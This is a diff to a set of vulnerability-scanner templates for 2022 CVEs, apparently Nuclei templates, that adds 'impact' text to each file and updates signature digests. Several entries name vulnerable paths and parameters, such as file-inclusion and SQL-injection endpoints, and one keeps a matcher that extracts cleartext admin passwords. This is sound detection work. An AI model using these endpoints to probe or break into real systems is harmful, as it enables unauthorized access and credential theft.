+# digest: 4a0a00473045022100b9f97938cf26baa9318a5b8bcfa9e4fc05e54eb069f1bd2d220e21c9669a627e022074eb60e064d336e7f75932972f29607737b0f6cca2609c3ed3d180777845c71f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml
index ea703a3cc6..04ea9627d5 100644
--- a/http/cves/2022/CVE-2022-30776.yaml
+++ b/http/cves/2022/CVE-2022-30776.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203c3c0ea8168eb091dbf1e04f38f89e0405651d23f75a8d6c0637968b36f7661f0221008a3d573666aacde8e767b172baf53c6ac56e118047b3cfc3c3ad7c7eb68393b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d09513d2431b815e3fcda62e9939007d96d3ae05c08eb899df1a8187e3cb1fce02202c18d956cfbf2de01f3ad51af9d2988eb869b8c933fa2a64b472448de5e10a67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml
index 1960df6e2a..8ae62b9f67 100644
--- a/http/cves/2022/CVE-2022-30777.yaml
+++ b/http/cves/2022/CVE-2022-30777.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100be5c779bb670772178c78d2e63aa0922d700125859f273d68b33b5dfcf41936302205b6914fa7a853e0cac84d2b76562539042c06e4098869ab25e398507e79a6c04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202d22de5c5c8760606631d76c3e91e6823f38d637e55588301641d69417f85ad2022100cf952417d07b0c57b2078b89a88c8a3f18f00e10c5ffac1e9a5e38612e4dd05a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml
index bf74b2a0b9..eda5c4e739 100644
--- a/http/cves/2022/CVE-2022-31126.yaml
+++ b/http/cves/2022/CVE-2022-31126.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: Users are advised to upgrade to latest version.
   reference:
     - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100dd1392141fc76e09de38e70e0cdbee05d44d74f0b1ffe92b4fddb753996b2ca402210088d252999e6f9a7e76638e3eac50394c7c123a122e37d755bd4523d9b2a8e0b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206e1d24c6f1ddb357528b58e970ee22c621d6ceb96b56a295802acbcde7246a97022100eefe689c7c8c3a603b3d23c9069052b08d467b69f87dfbf3ffd90378924e328d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml
index ac23aa2100..88f5279ab8 100644
--- a/http/cves/2022/CVE-2022-31268.yaml
+++ b/http/cves/2022/CVE-2022-31268.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.
   remediation: |
     Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268).
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022052d6012bd1a4e52639afedbcb701b6b56f24f65f9fc85ce201d8f1345092cc7d022100c1a3fd7892604cd6dd5913e8e897a82d42c1ac79bca5a682f3ac43f3412eb8d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100817a1a6ef4fda806d025f3ac71130cde51cb3c35ebe39c49212b0a18cd69387c02206e311bd5eb8c23daa2c3888a9d998780b2cafa724912086e0147c5306f65163a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml
index 5bf74c078a..9be0d5cc32 100644
--- a/http/cves/2022/CVE-2022-31269.yaml
+++ b/http/cves/2022/CVE-2022-31269.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the device.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: regex
         regex:
           - Password='(.+?)'
-# digest: 490a0046304402203da22dadf508700d66d8866ffc3b8f1a720e7a4ef2b9dbf2499c6992bfe8b506022077836e79ec32b586a3720e0c87a44c317a93e90cbd65d1f30fbb939fef419d2d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200b028b4a35c52dc22cc0f11222a79e39c071e892a1f06c906df1cc143f34d700022100bd975922a07dfda29b36780ca6c09c1f1c6d6d19ab919297892456231086060a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml
index 01bb6e8f22..ca6c01bdc5 100644
--- a/http/cves/2022/CVE-2022-31299.yaml
+++ b/http/cves/2022/CVE-2022-31299.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207d11990a9c82b9f2d74f6acd3ecb0a979d6d0faf887b00db3b16d39f059bb99c02210080a98f6ff560c15f6091a36e9942c84e2d166ef25326f88da6a0fc5d701e9aa1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022007731856229c917928912788d627e37eba5f9e489edaec9acc871fe35a56900602206f6e39e7275045f7a5c8e65751e219f743fea6c8a6ad5c32d81e9f469a194a4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml
index c66af858f7..934fb62a7f 100644
--- a/http/cves/2022/CVE-2022-31373.yaml
+++ b/http/cves/2022/CVE-2022-31373.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022035935f33ec9dcc01212a4aed4edb2ddbe9f0679376800ecc9cb185bcb15ddb2102202c4c7268470a6c4e31cffdf0b99115e9f2d655846ceb10a6143c2adb33539049:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008d27fcb53ff450e19c49a388a3f9fcaff336059edb1a30d52f956e09227cc4c3022037c150131219f9c1d5edd13a1582b27fb099a83ef886b26aa39c9fdc39bd338c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml
index 5283d396d3..803e0761bb 100644
--- a/http/cves/2022/CVE-2022-31474.yaml
+++ b/http/cves/2022/CVE-2022-31474.yaml
@@ -5,6 +5,8 @@ info:
   author: aringo
   severity: high
   description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.
   remediation: Upgrade to at least version 8.7.5 or higher
   reference:
     - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220660bb51ddd2dea68610f239c738f37f10c2f3414d4cb0533788a2d1f4267d1d9022100c4353b8ccb2632571575d9652c87295f7e88f669ce8d6ba3d45c2acb1aaca9c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b82c3ae600ae07fc5eb972836d9c33eb6fd87c06bf41e915e2d23c1d9b1df999022100df0f91199c86472507086552bb31d28269447f275cbaedfb508a21c277ed2300:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml
index e109fabc6a..bdbef3fe68 100644
--- a/http/cves/2022/CVE-2022-31499.yaml
+++ b/http/cves/2022/CVE-2022-31499.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
   remediation: |
     Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - status_code == 200
           - contains(body, '{\"CardNo\":false')
         condition: and
-# digest: 4b0a00483046022100f5c1cc8bbc0f53a499a83608d77c838c4abe4f9d9baf3f90e002afadd93d0ebc022100d41cf62321992a8df38ccf5f7e5bd7a41d73b86551e05e93ce31111b94ff50e9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220407b662c6ef8289ff3e92e3e0b82f8bd825c3a8f6089e264ca00d9f4f282b4ca02210095acc4e56e628cb1e80f5985c7dbde1ca934d814f7b65c15a1122499836c0738:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml
index add7b88f81..65f1df65a0 100644
--- a/http/cves/2022/CVE-2022-31656.yaml
+++ b/http/cves/2022/CVE-2022-31656.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
+  impact: |
+    The impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information.
   remediation: |
     To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b9a646a919123c0d3bb706143ffb5b9c2f8052d56dc7b4ddb375c816b163ad6002207a4ff1492b0fa8e449ce934e7a2bc23512d378c06312c10082d32d4ad6fa7f8d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f9eb05b618866e56b61ee5b51598ad079669ee2bf330e635cd9520c61f57fd7e02207bac2202975fb5b91d133070d319098bd92b4c1b323cd9c1ce9ece16ef517cf6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml
index e8f0fff7ed..d38c08f056 100644
--- a/http/cves/2022/CVE-2022-31798.yaml
+++ b/http/cves/2022/CVE-2022-31798.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009bc0901347f427ff36976c9e9eec770dde8f59022c8ceb961f1d03144fe43179022100aafd89b859003f80f2bda1415224806a07ca84aea6948db1443ad4665aafec20:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207470ff74390fdf01cfe5d3a426acfce06449b29781488b6c646a6556fdcad712022008ac4984b72e72111a5b33c091ecebf54ba24fb91ab2d165e175099c74e60fda:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml
index 5edf0e501c..cb3a5fd266 100644
--- a/http/cves/2022/CVE-2022-31814.yaml
+++ b/http/cves/2022/CVE-2022-31814.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
   remediation: |
     Upgrade to a patched version of pfSense pfBlockerNG (>=2.1..4_27) to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
         part: interactsh_protocol # Confirms the DNS Interaction
         words:
           - "dns"
-# digest: 490a00463044022000d098b7db63172e2202c2a038d1b0d423b9a867af98f8605638a9eb4c9c35b5022001392e90d53142547d3dddacbfa98e9fb6755b5c5d3c720bdd905ac24e2411e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202ccb83051658fa0b9bffc171eadf9da749d4bc3a38f4cf0583d390900238e46802205a1547a0740b32877a59025eee6eb3d1af98eaceb115c9c57122a2bbb7dc1fd1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml
index 41f341183f..242591a7f4 100644
--- a/http/cves/2022/CVE-2022-31845.yaml
+++ b/http/cves/2022/CVE-2022-31845.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as login credentials or network configuration.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220381d6a2d040c62f3931e7476397460bb9b0908ac5e7137c40fcb2b0d5dfdd65d022064286b5a50b14a6aee5fd203029ef2f1f119281a09944040699ac825e3fbb068:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204f4ee419486acea944b3e33f12dcad3fa324c59a0618a062d73177313f9e5359022018e2be4ee63c6517451e06464242ae44fff028e5c76ff545bcf7d3edea0ec0d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml
index b6689a8fa6..df0fc5fae5 100644
--- a/http/cves/2022/CVE-2022-31846.yaml
+++ b/http/cves/2022/CVE-2022-31846.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as router configuration settings and user credentials.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100dd62c42bc65b24920aa090d29fb9d7a84c0af6b9fad9c9cca5cebe64e933a77d022047c77f6a0f613b1b8fd52a0fb86d2627d6de328f93b15f844bd3a9b0357d244c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c44f5dd39598e7abdd2fc0d5fe5caf8ffa79e28ab2b2781b322c1b1984239de702202a1af6035886349114160d2645bab0930d4b50594998c7a936824e09c5ae1027:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml
index 45d3c341bb..307005f87e 100644
--- a/http/cves/2022/CVE-2022-31847.yaml
+++ b/http/cves/2022/CVE-2022-31847.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207fb6d5724c473352b2748efaaad2c35ec7d1b00fa5117737b9f724ded1443d81022100e6d36184b67f41469150ea380b375fbbf63e6021465f250ff4457e0ae497ef6f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d4bb0e4fe507283d12638783cb96fe74607836852479cea3f7a893857fe65cea0220510e5ab97958b6c3e3fbbb4af5f6b9e69b11f947d3f14a6997c7936b4c716e2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml
index e33a1f50cf..807de2fc52 100644
--- a/http/cves/2022/CVE-2022-31854.yaml
+++ b/http/cves/2022/CVE-2022-31854.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of Codoforum.
   reference:
@@ -89,4 +91,4 @@ http:
         regex:
           - name="CSRF_token" value="([0-9a-zA-Z]+)"/>
         internal: true
-# digest: 490a0046304402200602b0e3ff5a240058ac1e4b53815e2717b6f4e454ef0d401e4a63e4d40c08bf02203f553df589375a423a9fdd122f191d643056e1cf6b04a8ae0e92b7b304438f78:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008fa3970a15c018af41f4b54cd8c3c062265c306ef4a95a90d33612447897298c022100f72c9e97620964b33d670ab3a9baee8230ce50675e007154515c916e46e1ce32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml
index b061b76d98..c788625652 100644
--- a/http/cves/2022/CVE-2022-31879.yaml
+++ b/http/cves/2022/CVE-2022-31879.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'contains(content_type_2, "text/html")'
           - 'contains(body_2, "Dashboard")'
         condition: and
-# digest: 490a004630440220082c4229c35a73cdba750d4ede6359da770b8fe4449be02fb3289003b83234db02204628e5fa54609513c3e64ae96ce31e7982b45f988a0d811c167871af6d9ee21f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009d86641061c695f402d109856236e7bc3149202635e69c68ac244c9389cf4a130221008a7ecd0912b655ce9e11d9962807753ddf245c710bc604c5c871b9e30ba395a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml
index 3c7630e067..224c6995d6 100644
--- a/http/cves/2022/CVE-2022-31974.yaml
+++ b/http/cves/2022/CVE-2022-31974.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ec0d94d1861dbe89fa3c750ff0d17be6907a127cda71f77bf7ee85dfa6d43595022062b70ad969856f4a25f51dac41d1bb2e4b184a5cbccd1f429fa2bf14046e3a47:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b031b7cf715cb948919493fe831055aa88c7842a3d17b74e2687745b75c6bfb602210087a29b0ddb00206c63c841aa7e6fdcc766a3551c2d6baa991e45008501df1c37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml
index 06213d3cc4..8e9db2d565 100644
--- a/http/cves/2022/CVE-2022-31975.yaml
+++ b/http/cves/2022/CVE-2022-31975.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100fc4db36215fe1afacc41a88fcda1f3773420b1fb4178405d5dda9e25d976189102204a785ab9c1dec7e91abf4b628a5403f9db85bb5cd4dd1363df8882dd39569850:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ea2441b04225915fff0b067f1fe4f764ea5d5b6a4343d5940d5ed233ab96ed710220339893902ce2876b8ebaf4c21134a931f31c46b43a268cbf8c2dcc5b97177c20:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml
index cbca97353f..f44a43b6cb 100644
--- a/http/cves/2022/CVE-2022-31976.yaml
+++ b/http/cves/2022/CVE-2022-31976.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "status\":\"success\"}")'
         condition: and
-# digest: 490a0046304402204571faeed7a10458d14180476e493fb59f04ccac7988a82af927031ad5413010022019791c6b9b4d6673e1f2065d045cd98dba495aeed20c6d4c37898829f6cc632a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d3f81f2e2a2b4a4aa265df8536367c065aa77033e66544f924bad075681cd59c022100904d85a81feae9e08931cd070c6836b6942562dc6c2670c43e1947443373fbc3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml
index 0a062648fe..822e5d29b8 100644
--- a/http/cves/2022/CVE-2022-31977.yaml
+++ b/http/cves/2022/CVE-2022-31977.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "status\":\"success\"}")'
         condition: and
-# digest: 490a004630440220417baa6711e66174efc361fae1872157a0f209c5da6c69d39b2f981c0df85a47022036394ff35bb3f7c8a6a296edb7c4374731ad4f4893c2941405ea87aaccc29bab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210084a2d45b62d9642f0b7d536296a489b09f72cc6d1567450ba4d825fce327e63d022100d9045d7d9f0fddb8b884ab61c5cb24e2063ff9efb052972506c9e0dd2f8ad241:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml
index fb9e029484..c9a5c31b74 100644
--- a/http/cves/2022/CVE-2022-31978.yaml
+++ b/http/cves/2022/CVE-2022-31978.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "status\":\"success")'
         condition: and
-# digest: 4b0a00483046022100f453a943a5a621f7b3a76118c4419dd2cfac8c35f2c2243dc6b413edf63dedda02210085522dc2eb75b8c044f697b3a30cfbe209b6e3eca69a3cf07bd9430677b1c18e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201f466365820ee11c0f5edd8469d328d67891faad63d361e4f685fd3cb2655fa5022100d6b78e5c1dfdbc0dbe734d31c44218af2804be1f77f4846c0f5a9cebaece88e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml
index 4fc58ac70d..1f6ffefd1c 100644
--- a/http/cves/2022/CVE-2022-31980.yaml
+++ b/http/cves/2022/CVE-2022-31980.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
   reference:
@@ -40,4 +42,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "Control Teams")'
         condition: and
-# digest: 490a0046304402207c7ac8564df32107267828c2221cf3e8be7eae0b91cc82cc7e902b8f18e3475f02201aefa39fa6c99394d36e99ec7c53d57bc8ce8e5f458b68b6b0b5715995c0fe48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022034932a8c26635ccc81a539e0fe7b79b1ed6cfe8a5452bbfabcfbee9b49c810d4022100cdb9892dd75ff883c8624390da1055137ade8594b927136a498dcbe0cb1a0f59:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
